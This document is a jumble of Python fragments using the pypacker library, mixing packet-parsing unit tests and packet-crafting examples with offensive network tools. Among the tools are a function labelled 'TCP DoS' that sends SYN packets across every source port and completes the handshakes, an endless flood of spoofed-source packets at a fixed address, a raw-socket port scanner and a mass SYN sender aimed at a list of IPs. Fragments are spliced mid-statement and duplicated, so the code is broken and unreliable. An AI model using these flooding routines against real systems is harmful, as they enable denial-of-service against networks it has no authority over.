def buildtcp():
# Ethernet header
eth = ethernet.Ethernet()
eth.src = b"\x00\x0c\x29\xdf\xe3\xc0"
eth.dst = b"\x00\x0c\x29\x29\x85\xd2"
eth.type = ethernet.ETH_TYPE_IP
# IP header
ipp = ip.IP()
ipp.src = socket.inet_aton("172.16.13.165")
ipp.dst = socket.inet_aton("172.16.13.162")
ipp.p = ip.IP_PROTO_TCP
# TCP header
tcpp = tcp.TCP()
tcpp.sport = 60001
tcpp.dport = 80
tcpp.flags = tcp.TH_SYN
ipp.data = tcpp
ipp.len = len(str(ip))
ipp.id = 1
tcpp._TCP__calc_sum()
ipp._IP__calc_sum()
eth.data = ipp
# open sockets using the socket handler
#sock_l2 = SocketHndl(iface_name="eth1", mode=SocketHndl.MODE_LAYER_2)
# send raw bytes
#sock_l2.send(eth.bin())
#print(eth.bin())
return eth.bin()
def test_tcp_packet_filter_and_parse_with_field_template_with_non_existing_field_first(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
bpf_filter = "ip"
display_filter = "tcp"
field_templates = {"macro.ip.src": ["ipv6.src", "ip.src"]}
expected_output = {
"macro.ip.src": src_ip,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=field_templates,
expected_passed=True,
expected_output=expected_output,
)
def tcp_packet(tcp_payload) -> bytes:
packet = (
ethernet.Ethernet(src_s="00:00:00:12:34:ff", dst_s="00:00:00:ff:00:1e")
+ ip.IP(src_s="10.0.0.255", dst_s="21.53.78.255") + tcp.TCP(
sport=16424, dport=41799, flags=tcp.TH_ACK,
body_bytes=tcp_payload))
return packet.bin()
def test_filter_and_parse_without_filters(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=None,
display_filter=None,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def _generate_zero_pkt(self, src_ip, src_port, dst_ip, dst_port, proto):
assert proto == 6
zp = ethernet.Ethernet() + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP(
sport=src_port,
dport=dst_port,
flags=24,
body_bytes=bytearray(self.zpp))
return zp.bin()
def _make_syn_ack_packet(self, saddr, daddr, sport, dport, seq):
packet = ip.IP(src_s=saddr, dst_s=daddr) + tcp.TCP(
dport=dport,
sport=sport,
seq=seq,
ack=seq + 1,
flags=tcp.TH_SYN | tcp.TH_ACK,
)
return packet.bin()
def _create_tcp_base_packets(
conversation: Layer3Conversation) -> Tuple[Packet, Packet]:
src_port, dst_port = _generate_port(), _generate_port()
base_src_to_dst = (ethernet.Ethernet(
src_s=conversation.src_mac,
dst_s=conversation.dst_mac,
type=ethernet.ETH_TYPE_IP,
) + ip.IP(p=ip.IP_PROTO_TCP,
src_s=conversation.src_ip,
dst_s=conversation.dst_ip) +
tcp.TCP(sport=src_port, dport=dst_port))
base_dst_to_src = (ethernet.Ethernet(
src_s=conversation.dst_mac,
dst_s=conversation.src_mac,
type=ethernet.ETH_TYPE_IP,
) + ip.IP(p=ip.IP_PROTO_TCP,
src_s=conversation.dst_ip,
dst_s=conversation.src_ip) +
tcp.TCP(sport=dst_port, dport=src_port))
return base_src_to_dst, base_dst_to_src
def send_pkt(pkt_num):
ips = []
for i in range(0, pkt_num):
ips.append(str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)))
while True:
for i in range(0, pkt_num):
src_ip = ips[i]
print('src ip : ' + src_ip)
packet_ip = ip.IP(src_s=src_ip, dst_s="192.168.10.1") + tcp.TCP(dport=8888)
psock = psocket.SocketHndl(mode=psocket.SocketHndl.MODE_LAYER_3, timeout=10)
psock.send(packet_ip.bin(), dst=packet_ip.dst_s)
time.sleep(0.001)
psock.close()
def test_http_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 80
http_type = "GET"
uri = "/subtest/subsubtest"
version = "HTTP/1.1"
domain_name = "www.testwebsite.com"
body = "random body \x09\xff\x00"
bpf_filter = "ip"
display_filter = "http"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
"http.request.method": http_type,
"http.request.uri": uri,
"http.request.version": version,
"http.host": domain_name,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
+ http.HTTP(
f"{http_type} {uri} {version}\r\nHost: {domain_name}\r\n\r\n{body}\r\n".encode()
)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def test_tcp_packet_filter_and_parse_with_multiple_different_field_templates(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
bpf_filter = "ip"
display_filter = "tcp"
first_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
}
second_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
"macro.srcport": ["tcp.srcport", "udp.srcport"],
"macro.dstport": ["tcp.dstport", "udp.dstport"],
}
third_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
"macro.dstport": ["tcp.dstport", "udp.dstport"],
}
first_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
}
second_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"macro.srcport": src_port,
"macro.dstport": dst_port,
}
third_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"tcp.srcport": src_port,
"macro.dstport": dst_port,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=first_field_templates,
expected_passed=True,
expected_output=first_expected_output,
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=second_field_templates,
expected_passed=True,
expected_output=second_expected_output,
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=third_field_templates,
expected_passed=True,
expected_output=third_expected_output,
)
def reverse_address(self):
"""
reverse_address(...) should be overwritten to be able to reverse
source/destination addresses (see ethernet.Ethernet)
"""
self.src, self.dst = self.dst, self.src
# Parse from raw bytes
# First layer (Layer 2)
newproto_bytes = b"\x66" + b"AAAA" + b"BBBB" + b"\x00\x16" + b"\x00" + b"1234" + b"\x00A\x01B\x02C"
# Next upper layer (Layer 3)
ip_bytes = ip.IP().bin()
# Layer above upper layer (Layer 4)
tcp_bytes = tcp.TCP().bin()
newproto_pkt = NewProtocol(newproto_bytes + ip_bytes + tcp_bytes)
print()
print(">>> Layers of packet:")
print("Output all layers: %s" % newproto_pkt)
print("Access some fields: 0x%X %s %s" %
(newproto_pkt.type, newproto_pkt.src, newproto_pkt.dst))
print("Access next upper layer (IP): %s" % newproto_pkt.ip)
print("A layer above IP: %s" % newproto_pkt.ip.tcp)
print("Same as above: %s" % newproto_pkt[tcp.TCP])
# Create new Packet by defining every single header and adding higher layers
newproto_pkt = NewProtocol(
type=0x66, src=b"AAAA", dst=b"BBBB", hlen=0x11, yolo=b"1234", options=[b"\x00A\x01B\x02C"]) +\
ip.IP() +\
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2",
tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1")
psock.send(arpreq.bin())
# send ICMP request
icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890")
psock.send(icmpreq.bin())
# send TCP SYN
tcpsyn = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_TCP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
tcp.TCP(sport=12345, dport=80)
psock.send(tcpsyn.bin())
# send UDP data
udpcon = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_UDP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
udp.UDP(sport=12345, dport=80)
udpcon[udp.UDP].body_bytes = b"udpdata"
psock.send(udpcon.bin())
psock.close()
#
# send and receive packets on layer 3 (assumes running HTTP-server on port 80)
#
packet_ip = ip.IP(src_s="127.0.0.1", dst_s="127.0.0.1") + tcp.TCP(dport=80)
psock = psocket.SocketHndl(mode=psocket.SocketHndl.MODE_LAYER_3,
timeout=10)
def tcp_cb(pargs):
"""TCP DoS"""
iptables_rules_info = """
iptables -I OUTPUT -p tcp --tcp-flags ALL RST,ACK -j DROP
iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP
iptables -I INPUT -p tcp --tcp-flags ALL RST -j DROP
"""
logger.info("For best performance set set these rules: %s",
iptables_rules_info)
pkt_tcp_syn = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\
ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_TCP) +\
tcp.TCP(sport=12345, dport=pargs.port_dst)
# Use raw sockets to circumvent network stack
psock_send = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
psock_rcv = psocket.SocketHndl(iface_name=pargs.iface_name,
mode=psocket.SocketHndl.MODE_LAYER_2)
is_running = True
def answer_cycler():
def filter_cb(pkt):
try:
return pkt.ip.tcp.flags == tcp.TH_SYN | tcp.TH_ACK
except Exception as ex:
#logger.warning(ex)
pass
return False
while is_running:
try:
pkt_rsp = psock_rcv.recvp(filter_match_recv=filter_cb)[0]
#logger.debug("got SYN,ACK: %r", pkt_rsp)
except IndexError:
logger.debug("no packets..")
continue
pkt_rsp.reverse_all_address()
tcp_l = pkt_rsp.ip.tcp
tcp_l.flags = tcp.TH_ACK
tcp_l.seq, tcp_l.ack = tcp_l.ack, tcp_l.seq
tcp_l.ack += 1
psock_rcv.send(pkt_rsp.bin())
answer_thread = threading.Thread(target=answer_cycler)
answer_thread.start()
randrange = random.randrange
tcp_l = pkt_tcp_syn.ip.tcp
logger.debug("sending...")
input = 0x31CE
#for cnt in range(pargs.count):
for sport in range(0, 65536):
tcp_l.seq = randrange(1000, 123123)
tcp_l.sport = sport ^ input
psock_send.send(pkt_tcp_syn.bin())
print("\rsent %d syn" % sport, end="")
#time.sleep(0.0001)
print()
logger.debug("finished")
is_running = False
time.sleep(999)
psock_send.close()
psock_rcv.close()
import time
from pypacker.layer12.ethernet import Ethernet
from pypacker.layer3 import ip
from pypacker.layer4 import tcp
from pypacker.layer567 import http
import dpkt
pkt_eth_ip_tcp = Ethernet() + ip.IP() + tcp.TCP(dport=80)
http_l = http.HTTP(startline=b"GET / HTTP/1.1",
hdr=[(b"header1", b"value1")],
body_bytes=b"Content123")
pkt_eth_ip_tcp += http_l
pkt_eth_ip_tcp_bts = pkt_eth_ip_tcp.bin()
LOOP_CNT = 100000
print(
"or = original results (Intel Core2 Duo CPU @ 1,866 GHz, 2GB RAM, Python v3.3)"
)
print("nr = new results on this machine")
print("rounds per test: %d" % LOOP_CNT)
print(">>> testing pypacker parsing speed")
t_start = time.time()
for cnt in range(LOOP_CNT):
pkt1 = Ethernet(pkt_eth_ip_tcp_bts)
# dpkt does not parse TCP content but pypacker does
lowest_layer=ethernet.Ethernet,
max_amount=1)
except:
print("stopping receive cycler")
break
thread_rcv = threading.Thread(target=rcv_cycler, args=[sock_rcv])
thread_rcv.start()
print("starting to scan")
for port in range(0, 0xFFFF + 1):
print("\rPinging TCP port %d" % port, end="")
while not open_ports.empty():
port_open = open_ports.get()
print("\nTCP Port %d on %s seems to be open" % (port_open, IP_DST))
pkt_send = ethernet.Ethernet(dst_s=MAC_DST, src_s=MAC_SRC) +\
ip.IP(src_s=IP_SRC, dst_s=IP_DST) +\
tcp.TCP(sport=PORT_SRC, dport=port, seq=TCP_SEQ)
sock_send.send(pkt_send.bin())
print()
print("waiting some seconds to receive delayed responses")
time.sleep(2)
sock_rcv.close()
sock_send.close()
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2",
tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1")
psock.send(arpreq.bin())
# send ICMP request
icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890")
psock.send(icmpreq.bin())
# send TCP SYN
tcpsyn = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_TCP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
tcp.TCP(sport=12345, dport=80)
psock.send(tcpsyn.bin())
# send UDP data
udpcon = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_UDP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
udp.UDP(sport=12345, dport=80)
udpcon[udp.UDP].body_bytes = b"udpdata"
psock.send(udpcon.bin())
psock.close()
except socket.timeout as e:
print("timeout!")
except socket.error as e:
print("you need to be root to execute the raw socket-examples!")
"""
>>> Code snippets
def _generate_ack(self, src_ip, src_port, dst_ip, dst_port, proto):
assert proto == 6
ack = ethernet.Ethernet() + ip.IP(
src_s=dst_ip, dst_s=src_ip) + tcp.TCP(
sport=dst_port, dport=src_port, flags=16)
return ack.bin()
MAC_DST = "24:65:11:85:E9:AC"
IP_SRC = "192.168.178.26"
FILE_IP_DST = sys.argv[2]
print("destination IP addresses file: %s" % FILE_IP_DST)
IP_DST = open(FILE_IP_DST, "r").read().split("\n")[:-1]
print("amount addresses: %d" % len(IP_DST))
REPITITIONS = int(sys.argv[1])
print("repititiona: %d" % REPITITIONS)
psock_req = psocket.SocketHndl(iface_name=IFACE,
mode=psocket.SocketHndl.MODE_LAYER_2)
tcp_syn = ethernet.Ethernet(dst_s=MAC_DST, src_s=MAC_SRC) +\
ip.IP(src_s=IP_SRC, dst_s="127.0.0.1", p=ip.IP_PROTO_TCP) +\
tcp.TCP(sport=12345, dport=1337)
print("%r" % tcp_syn)
ip = tcp_syn.ip
tcp = tcp_syn.ip.tcp
randrange = random.randrange
for x in range(REPITITIONS):
if x % 10000 == 0:
print("sent %d" % x)
ip_dst_str = IP_DST[randrange(0, len(IP_DST))]
try:
ip.dst_s = ip_dst_str
except:
print("could not parse: %s" % ip_dst_str)
continue
